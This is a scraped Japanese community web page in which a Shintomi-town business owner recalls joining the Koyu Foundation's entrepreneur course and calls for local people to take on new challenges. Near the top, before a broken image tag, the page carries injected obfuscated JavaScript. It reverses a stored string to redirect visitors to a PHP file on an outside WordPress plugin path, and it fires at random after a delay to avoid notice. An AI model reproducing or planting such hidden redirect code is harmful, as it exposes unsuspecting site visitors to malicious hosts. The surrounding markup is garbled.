新富町のしごと

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tomi.work/wp-content/uploads/2019/04/IMG_6616.jpg” alt=”” width=”1600″ height=”1067″ class=”aligncenter size-full wp-image-136″ />

そんな時に出会ったのがこゆ財団さんです。

2017年4月に町内で開催されたこゆ財団の起業家育成塾「児湯シータートル大学」キックオフイベントに参加したのですが、面白いことをやろうとしている人たちだって率直に感じたし、地域で商売をしている人間として、外の先進事例を学べるいい機会だと感じました。実際、私は「児湯シータートル大学」に参加し、4ヶ月ほどビジネスについて学びを深めることができました。

こゆ財団さんは町内外のいろんな人とつながりをつくっていて、フードコーディネーターである小野茜さん(現 新富町地域おこし協力隊)との出会いのきっかけにもなりました。お酒のみならず、フードビジネス全体に詳しい彼女の存在も大きかったですね。それ以来、とにかくたくさんの刺激を受けよう!という一心で活動してきました。

どこの地域も同じかもしれませんが、新富町は住みやすい町である一方、新しいことへのチャレンジに消極的なところがある。地方ならではの課題だと感じていました。

でも、これからは地方に住む人間もチャレンジしていく必要があると私は考えます。
こゆ財団のみなさんには大いにやってもらいたいと思うし、協力もしたい。私も負けずにチャレンジしていくつもりです!